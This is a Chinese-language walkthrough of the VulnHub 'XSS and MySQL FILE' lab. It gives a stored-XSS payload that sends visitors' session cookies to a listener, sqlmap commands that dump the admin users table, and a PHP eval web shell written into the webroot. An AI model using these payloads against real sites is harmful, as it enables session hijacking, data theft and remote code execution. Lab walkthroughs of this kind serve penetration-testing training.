XSS_and_Mysql_file靶场攻略

下载地址

https://download.vulnhub.com/pentesterlab/xss_and_mysql_file.iso

扫描ip

复制代码
arp-scan -l 

扫描端口

复制代码
nmap -sS -sV -p- 192.168.89.137

扫描目录

复制代码
dirsearch -u 192.168.89.137

访问80端口,点击测试

测试漏洞位置

复制代码
<script>alert(1)</script>

设置存储型xss,kali监听

复制代码
<script>document.write('<img src="http://192.168.89.137:8080/?' + document.cookie +'"/>');</script>
复制代码
python -m http.server 8080

一分钟左右会有cookie回显

登录admin

点击admin,随便输入账号密码抓包

修改cookie为kali监听到的,放行后可登录

点击edit,使用sqlmap注入

复制代码
sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch --dbs --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch -D 'blog' --tables --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch -D 'blog' -T 'users' --dump --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4"

得到账号密码

蚁剑shell

在kali创建一个php文件

复制代码
vim 1.php

<?php @eval($_POST['123456']);?>

使用sqlmap将文件放到网站

复制代码
sqlmap -u "http://192.168.89.137/admin/edit.php?id=2" --batch --random-agent --cookie="PHPSESSID=vm4n2bbq63u6crs6m4p2ef5qv4" --file-write /home/kali/1.php --file-dest /var/www/css/1.php

使用蚁剑连接

相关推荐
格砸11 分钟前
从入门到辞职|从ChatGPT到OpenClaw,跟上智能时代的进化
前端·人工智能·后端
Live000001 小时前
在鸿蒙中使用 Repeat 渲染嵌套列表,修改内层列表的一个元素,页面不会更新
前端·javascript·react native
柳杉1 小时前
使用Ai从零开发智慧水利态势感知大屏(开源)
前端·javascript·数据可视化
兆子龙1 小时前
从高阶函数到 Hooks:React 如何减轻开发者的心智负担(含 Demo + ahooks 推荐)
前端
狗胜1 小时前
测试文章 - API抓取
前端
三小河1 小时前
VS Code 集成 claude-code 教程:告别海外限制,无缝对接国内大模型
前端·程序员
jerrywus1 小时前
前端老哥的救命稻草:用 Obsidian 搞定 Claude Code 的「金鱼记忆」
前端·agent·claude
球球pick小樱花1 小时前
游戏官网前端工具库:海内外案例解析
前端·javascript·css
用户60572374873082 小时前
AI 编码助手的规范驱动开发 - OpenSpec 初探
前端·后端·程序员